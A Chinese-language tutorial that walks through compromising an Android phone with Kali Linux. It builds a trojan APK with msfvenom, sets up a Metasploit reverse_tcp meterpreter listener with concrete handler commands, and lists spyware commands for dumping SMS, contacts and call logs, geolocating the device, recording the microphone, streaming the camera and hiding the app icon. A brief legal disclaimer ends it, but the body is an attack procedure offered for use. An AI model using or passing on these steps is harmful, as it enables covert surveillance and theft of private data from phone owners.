安卓手机随处可见，手机的私密性，安全性成为关键，本文将在理想环境下，介绍如何利用kali入侵一部安卓手机。

废话不说，教程开始！

1.打开终端提示符下输入以下命令，使用msfvenom工具来创建有效载荷APK文件（生成apk木马程序）。

（1）

代码注释：

*LHOST:本机IP

*LPORT：这的5555是随意的端口，可以自己更改

*/root/apk.apk(追加到指定的路径生成apk.apk文件)

2.将木马安装到手机上（我直接用自己手机测试学习）

（2）

3.启动msf,msfconsole输入命令

1.msf> use exploit/multi/handler //加载模块

2.msf> set payload android/meterpreter/reverse_tcp //选择Payload

#修改Ip和端口

3.msf> set LHOST 192.168.43.18 //Ip设置为本机ip

4.msf> set LPORT 5555 //端口设置为配置的本地端口

5.msf> exploit //开始监听，等待木马响应

红色框出的地方就说明手机上线了 然后可以输入sysinfo 查看手机信息了。

（3）

4.接下来是一些常用命令

Stdapi: Webcam Commands

===================================

    webcam_list  列出网络摄像头

    record_mic [ˈrekərd]/记录/  从默认麦克风录制音频为X秒

    webcam_chat  开始视频聊天

    webcam_snap  从指定的摄像头获取快照

    webcam_stream -i 1  从指定的网络摄像头播放视频流[选择后摄像头]

Android Commands

=================

    activity_start  从URI字符串启动Android活动

    check_root  检查设备是否有根

    dump_calllog  获取调用日志

    dump_contacts  获取联系人列表

    dump_sms  获取短信

    geolocate  利用地理定位获取当前LAT

    wlan_geolocate  利用WLAN信息获取当前LAT

    hide_app_icon  从发射器隐藏应用程序图标

    interval_collect  管理区间收集能力

    send_sms  从目标会话发送短消息

    set_audio_mode

    sqlite_query  从存储库查询SQLite数据库

    wakelock  启用/禁用Wakelock

好了，教程到此结束了，教程只是引导，真的技术还需要自己去亲自实践。

（注意：凡未经他人同意，非法侵入，窃取他人信息的网络行为，都是违法犯罪行为）